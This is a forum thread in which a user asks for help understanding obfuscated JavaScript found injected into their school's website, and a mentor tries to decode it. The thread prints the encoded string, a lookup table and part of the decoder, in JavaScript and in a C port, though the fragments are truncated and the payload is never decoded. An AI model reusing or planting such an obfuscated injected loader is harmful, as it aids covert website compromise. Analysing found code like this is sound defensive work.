1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

Help me figure this out please!!

Discussion in 'JavaScript and AJAX' started by ed5480, Mar 11, 2009.

  1. ed5480

    ed5480 New Member

    I found this on my website and i dont know what it does or how it got there. If anyone can help me try and figure this thing out please let me know.
    <script language=JavaScript>
    function rmban(x)
    {var l=x.length,
    t=Array& #40;63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5
    rmban(& #39;yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkU
    <!-- -->
  2. xpi0t0s

    xpi0t0s Mentor

    Well it could do absolutely anything. It's clear it's been severely obfuscated.
    So if you delete it on the grounds that it must have been obfuscated for a reason, and that probably wasn't a good reason since whoever put it there did so without your knowledge, I would suggest just deleting it. If it reappears raise it with your ISP, maybe it's some advertising junk, especially if you've got a "free" (i.e. advert supported) hosting provider. Or maybe there's some lack of security on their part that they would want to know about, since it appears people can add what looks like potentially malicious code to any of their customers' websites.

    "potentially malicious" because it's obfuscated and uncommented. If it were there for valid reasons it wouldn't be at least one of those.
  3. ed5480

    ed5480 New Member

    the website belongs to my high school. its our schools website and no one on the team that works on it knows javascript. the site is not hosted on a free server or anything like that. we want to know what it does. based on the research ive done it seems like it may be encoding or decoding a php string to run on our server but we could be completely wrong. If anyone knows what this does PLEASE let us know. It has been removed from the site but we would like to figure out what it does and hopefully that will help us figure out where it came from and possibly why its there. Thanks
  4. xpi0t0s

    xpi0t0s Mentor

    I can't figure out what it does. I've converted it to C and I think I've got it right but it just produces junk. There could be some nuance of Javascript I'm not aware of that means I've got the conversion wrong, which isn't unlikely as I'm not a Javascript expert, but I've tried a few things and nothing produces anything that looks meaningful.
    Note that the Go4Expert parser will most likely add spaces to the long strings, as I think it has done with your original post. In this there are no spaces in x or t.
    Also I've tweaked some of the code based on the actual length of x, e.g. as it's less than b, ceil(l/b) will be 1.
    	char *x="yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkUTYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJcw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0rGGq";
    	int t[]={63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5,6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61};
    	int l=(int)strlen(x);
    	int b=1024,i,j;
    	int w=0,s=0,p=0;
    	for (j=1/*ceil(l/b)*/; j>0; j--)
    		char r[1024];
    		int rptr=0;
    		for (i=l; i>0; i--)

Share This Page